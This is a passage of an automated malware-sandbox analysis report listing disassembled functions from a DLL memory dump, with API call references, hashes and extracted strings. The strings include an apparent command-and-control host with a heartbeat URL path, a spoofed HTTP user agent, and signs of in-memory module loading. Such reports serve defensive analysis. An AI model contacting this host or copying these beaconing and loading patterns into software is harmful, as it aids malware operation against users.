                                                      • /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s, xrefs: 1000D2AD
                                                      • api.5566331.com, xrefs: 1000D2DD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle$MutexReleaseTime$FileH_prologSleepSystemTerminateThread__aulldiv__time64_rand_sprintf
                                                      • String ID: /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s$api.5566331.com
                                                      • API String ID: 600006260-1514844053
                                                      • Opcode ID: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
                                                      • Instruction ID: 3c7cfe678d53cd4cfc3496ea4f5962675d2c477474c38f7e46c86e78bbea2ba5
                                                      • Opcode Fuzzy Hash: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
                                                      • Instruction Fuzzy Hash: 61A1BB715047409FE720DF25C885B9EB7F8FF84395F000A2EF596821A6DBB1B684CB62
                                                      APIs
                                                      • _malloc.LIBCMT ref: 100321AB
                                                      • InternetOpenA.WININET(okhttp/3.10.0,00000000,00000000,00000000,00000000), ref: 100321D1
                                                      • InternetSetOptionA.WININET(?,00000006,000007D0,00000004), ref: 100321F0
                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,04000000,00000000), ref: 10032209
                                                      • HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 1003224A
                                                      • InternetReadFile.WININET(?,00000000,0000000F,00000001), ref: 10032288
                                                      • InternetCloseHandle.WININET(?), ref: 1003230F
                                                      • _free.LIBCMT ref: 10032343
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$Open$CloseFileHandleHttpInfoOptionQueryRead_free_malloc
                                                      • String ID: $okhttp/3.10.0
                                                      • API String ID: 3353598147-1811919558
                                                      • Opcode ID: e89ea9ecb87e72443c43d04e6883bf0f287679ed8ef464e104359b3e63fe85c2
                                                      • Instruction ID: 6613a09fe64cb60b8deb12e6b99425ea02e756cb61ab0c2e0afa952f94dfd23c
                                                      • Opcode Fuzzy Hash: e89ea9ecb87e72443c43d04e6883bf0f287679ed8ef464e104359b3e63fe85c2
                                                      • Instruction Fuzzy Hash: 22616BB1D04249EFEB11DF94CC84B9EBBB9FF44701F104229F515AB290DB756A04CB50
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 1001BB55
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBB9
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBCC
                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBF0
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00000010,?,?,?,00000000), ref: 1001BC01
                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC10
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000010,00000000,00000000,?,?,00000000,00000010,?,?,?,00000000), ref: 1001BC29
                                                      • LocalFree.KERNEL32(00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC47
                                                      • LocalFree.KERNEL32(00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC4E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharLocalMultiWide$AllocFree$H_prolog
                                                      • String ID: msg
                                                      • API String ID: 3740934621-1753898927
                                                      • Opcode ID: bfc50e741bcaa8f8df6f650e6224fc60f4eb70a8fe3099340c31f495e8fb8e41
                                                      • Instruction ID: 3417434ddd44f1a49827b806d4fd3252603f52a92ad1e8b90fd295c3e2c89ed9
                                                      • Opcode Fuzzy Hash: bfc50e741bcaa8f8df6f650e6224fc60f4eb70a8fe3099340c31f495e8fb8e41
                                                      • Instruction Fuzzy Hash: 0A317AB5604606BFFB14DBA4CCE5EBFB7BDEF84650F100519F5019A690DBB0AD40CAA1
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10016F5E
                                                        • Part of subcall function 10017439: GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
                                                        • Part of subcall function 10017439: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
                                                        • Part of subcall function 10017439: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
                                                        • Part of subcall function 10017439: GetTickCount.KERNEL32 ref: 10017478
                                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000064,00000000,?,?,?,?,?), ref: 10016FDC
                                                      • WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 10016FF9
                                                      • recvfrom.WS2_32(?,00000000,00000400,00000000,?,?), ref: 10017034
                                                      • htons.WS2_32(?), ref: 10017052
                                                      • htons.WS2_32(?), ref: 10017070
                                                      • htons.WS2_32(?), ref: 10017082
                                                      • htons.WS2_32(00000000), ref: 10017150
                                                      • htons.WS2_32(?), ref: 10017161
                                                      • htonl.WS2_32(?), ref: 1001716A
                                                      • htons.WS2_32(?), ref: 10017175
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: htons$Time$Events$CountEnumFileH_prologLocalMultipleNetworkSystemTickUnothrow_t@std@@@Wait__ehfuncinfo$??2@htonlrecvfrom
                                                      • String ID:
                                                      • API String ID: 3657242895-0
                                                      • Opcode ID: 9f328af12706df1049d1de58173ec4bc6a977d55ca6c10be68cdefb092af4e46
                                                      • Instruction ID: 64033cd76504c99bd8c02ece87d976712559a0c07fba20b8b255469a797a9f68
                                                      • Opcode Fuzzy Hash: 9f328af12706df1049d1de58173ec4bc6a977d55ca6c10be68cdefb092af4e46
                                                      • Instruction Fuzzy Hash: E4A14C7590021AABDB11DFA4CC85BAEB7F9FF08344F108169F959EB181D734EA85CB60
                                                      APIs
                                                      • SetLastError.KERNEL32(000000C1,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B15F
                                                        • Part of subcall function 1001AC3E: SetLastError.KERNEL32(0000000D,1001B18D,?,000001C8), ref: 1001AC44
                                                      • SetLastError.KERNEL32(000000C1,?,?,000001C8), ref: 1001B1A4
                                                      • GetNativeSystemInfo.KERNEL32(?,?,?,000001C8), ref: 1001B1F0
                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B225
                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B23B
                                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,000001C8), ref: 1001B251
                                                      • HeapAlloc.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B258
                                                      • VirtualFree.KERNEL32(00000000,00000000,00008000,?,000001C8), ref: 1001B26B
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,000001C8), ref: 1001B2CE
                                                      • _memmove.LIBCMT ref: 1001B2DD
                                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,000001C8), ref: 1001B395
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocErrorLastVirtual$Heap$FreeInfoNativeProcessSystem_memmove
                                                      • String ID:
                                                      • API String ID: 321963714-0
                                                      • Opcode ID: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
                                                      • Instruction ID: 847e78ca93ded4939880e2626f7d24c040fa23cbcd70bd529c665b21de598f23
                                                      • Opcode Fuzzy Hash: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
                                                      • Instruction Fuzzy Hash: E981AB71A00A12ABEB01CF64CD91B6EB7F5FF44384F564058E901DF681E7B4EA91CB90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10019D8E
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10019D9D
                                                        • Part of subcall function 10032521: __lock.LIBCMT ref: 10032532
                                                      • int.LIBCPMT ref: 10019DB4
                                                        • Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B
                                                      • std::locale::_Getfacet.LIBCPMT ref: 10019DBD
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 10019DEB
                                                      • __CxxThrowException@8.LIBCMT ref: 10019DF9
                                                      • std::_Facet_Register.LIBCPMT ref: 10019E0F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
                                                      • String ID: bad cast$inc\http\HttpConnection.cpp
                                                      • API String ID: 2094517415-878910050
                                                      • Opcode ID: 33f0602c4098acafb2d6dec171571f8ad03e078d669f5d5aace8de008006760f
                                                      • Instruction ID: ff162fffaf9d315a833b4e117f5f7f71c2c72c274f303676d478dc7ea6359ac4
                                                      • Opcode Fuzzy Hash: 33f0602c4098acafb2d6dec171571f8ad03e078d669f5d5aace8de008006760f
                                                      • Instruction Fuzzy Hash: E811E1369005259BCB06DBA8CC95AEE77B8FF44261F10041AF411BB291DF74EE45CB90
                                                      APIs
                                                      • __lock.LIBCMT ref: 10043C61
                                                        • Part of subcall function 10037966: __mtinitlocknum.LIBCMT ref: 10037978
                                                        • Part of subcall function 10037966: __amsg_exit.LIBCMT ref: 10037984
                                                        • Part of subcall function 10037966: EnterCriticalSection.KERNEL32(00000000,?,100417BE,0000000D,1005F8C8,00000008,10041750,00000000,00000000,?,?,100092B7,?,?,?,1000A450), ref: 10037991
                                                      • __calloc_crt.LIBCMT ref: 10043C72
                                                        • Part of subcall function 10039211: __calloc_impl.LIBCMT ref: 10039220
                                                        • Part of subcall function 10039211: Sleep.KERNEL32(00000000), ref: 10039237
                                                      • @_EH4_CallFilterFunc@8.LIBCMT ref: 10043C8D
                                                      • GetStartupInfoW.KERNEL32(?,1005F990,00000064,10036606), ref: 10043CE6
                                                      • __calloc_crt.LIBCMT ref: 10043D31
                                                      • GetFileType.KERNEL32(00000001), ref: 10043D78
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10043DB1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 2673217650-0
                                                      • Opcode ID: bf8130ea20704dc4245055050c5bc798ba91e30348419140fc47d35c94ca2794
                                                      • Instruction ID: f4e5f61177d5235ce0b8ddcc98d3a42e21ff5188ee89bcb52046ecf7715843de
                                                      • Opcode Fuzzy Hash: bf8130ea20704dc4245055050c5bc798ba91e30348419140fc47d35c94ca2794
                                                      • Instruction Fuzzy Hash: F881CDB19056569FDB10CF69C88059EBBF0EF09320B34A26DD4A6EB3D1D734D802CB58
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10011035
                                                        • Part of subcall function 10010E45: __EH_prolog.LIBCMT ref: 10010E4A
                                                      • htonl.WS2_32(?), ref: 10011095
                                                      • htonl.WS2_32(?), ref: 1001109D
                                                      • __time64.LIBCMT ref: 100110A3
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • htonl.WS2_32(00000000), ref: 100110AC
                                                        • Part of subcall function 1001BD49: __EH_prolog.LIBCMT ref: 1001BD4E
                                                        • Part of subcall function 1001BD49: _sprintf.LIBCMT ref: 1001BDBB
                                                        • Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950
                                                        • Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704
                                                        • Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E
                                                      • htonl.WS2_32(-0000001C), ref: 100111BD
                                                      • htonl.WS2_32(00000000), ref: 100111C5
                                                      • _malloc.LIBCMT ref: 100111CB
                                                        • Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
                                                        • Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
                                                        • Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF
                                                      • _memmove.LIBCMT ref: 100111F5
                                                        • Part of subcall function 1001127B: __EH_prolog.LIBCMT ref: 10011280
                                                      • _free.LIBCMT ref: 1001120F
                                                        • Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
                                                        • Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prologhtonl$_memmove$HeapTime$AllocateErrorFileFreeLastSystem__aulldiv__time64_free_malloc_sprintf
                                                      • String ID:
                                                      • API String ID: 3199956779-0
                                                      • Opcode ID: f1def56a13bd0e5f7ff018ac0f083bd741eaff235069b981e355ef1a534298ac
                                                      • Instruction ID: 835a1f08fa8a8af1b86e20a3026624fe9f93954c30b8a38d983207ef737a5809
                                                      • Opcode Fuzzy Hash: f1def56a13bd0e5f7ff018ac0f083bd741eaff235069b981e355ef1a534298ac
                                                      • Instruction Fuzzy Hash: 63616D75D00258EFDF15DFA4D891AEEBBB8EF54300F10845AF419A7282DB34AA49CF51
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 100151FC
                                                      • GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2
                                                      • GetModuleHandleA.KERNEL32(00000000,1005D0FC,?,1005D0FC,00000000,?,000001C8,?), ref: 1001530A
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,000001C8,?), ref: 1001531D
                                                      • _strrchr.LIBCMT ref: 1001532C
                                                        • Part of subcall function 1001C0C6: __time64.LIBCMT ref: 1001C0CD
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0DF
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0F0
                                                        • Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6
                                                        • Part of subcall function 10009155: _memcmp.LIBCMT ref: 10009180
                                                        • Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C100
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _rand$Module$FileH_prologHandleNamePathTemp__time64_memcmp_memmove_strrchr
                                                      • String ID: Windows\$Windows\System32\$c:\
                                                      • API String ID: 2592937688-2965336455
                                                      • Opcode ID: 908297eadbe533f2f50bf3ae75fab14de167238dfd56605b7d6aa7874a5bc9b6
                                                      • Instruction ID: 20a427f31c4f15e36cfe53c2b189bc403b5a0b5ac72e4174fe82cc10685258e7
                                                      • Opcode Fuzzy Hash: 908297eadbe533f2f50bf3ae75fab14de167238dfd56605b7d6aa7874a5bc9b6
                                                      • Instruction Fuzzy Hash: 5C51D17650010ABAEB15EB60DC5AEFF336EDF84290F10411AF6159B096EF74EE898620
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10019CEA
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10019CF9
                                                        • Part of subcall function 10032521: __lock.LIBCMT ref: 10032532
                                                      • int.LIBCPMT ref: 10019D10
                                                        • Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B
                                                      • std::locale::_Getfacet.LIBCPMT ref: 10019D19
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 10019D47
                                                      • __CxxThrowException@8.LIBCMT ref: 10019D55
                                                      • std::_Facet_Register.LIBCPMT ref: 10019D6B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 2094517415-3145022300
                                                      • Opcode ID: a38696db8883c6e412b7eaff063af0cc41b27ba99ce18734625db7ec3f6a12ab
                                                      • Instruction ID: 09b45142de05753de7c69bdbf6457aaf3d2fa62407697bd191c098d170482372
                                                      • Opcode Fuzzy Hash: a38696db8883c6e412b7eaff063af0cc41b27ba99ce18734625db7ec3f6a12ab
                                                      • Instruction Fuzzy Hash: 7511E53AD009259BCB06DBA8C861AEE7778FF44261F50091AF412BB291DB74EE44CB90
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10019E32
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 10019E41
                                                        • Part of subcall function 10032521: __lock.LIBCMT ref: 10032532
                                                      • int.LIBCPMT ref: 10019E58
                                                        • Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B
                                                      • std::locale::_Getfacet.LIBCPMT ref: 10019E61
                                                      • std::bad_exception::bad_exception.LIBCMT ref: 10019E8F
                                                      • __CxxThrowException@8.LIBCMT ref: 10019E9D
                                                      • std::_Facet_Register.LIBCPMT ref: 10019EB3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
                                                      • String ID: bad cast
                                                      • API String ID: 2094517415-3145022300
                                                      • Opcode ID: 0c80b15087f34680015810c7033e5d2884b9b4a61e99b3f28240c0c78ac7cf9b
                                                      • Instruction ID: d05c16b9301d055acfc5c7e800783bf76f4c6c3f03bfd771f04d9d3e91f3dee8
                                                      • Opcode Fuzzy Hash: 0c80b15087f34680015810c7033e5d2884b9b4a61e99b3f28240c0c78ac7cf9b
                                                      • Instruction Fuzzy Hash: 4E11E13AD005259BCB06DBA8CD51AEE77B8FF44261F50091AF412BF291DB78EE45CB90
                                                      APIs
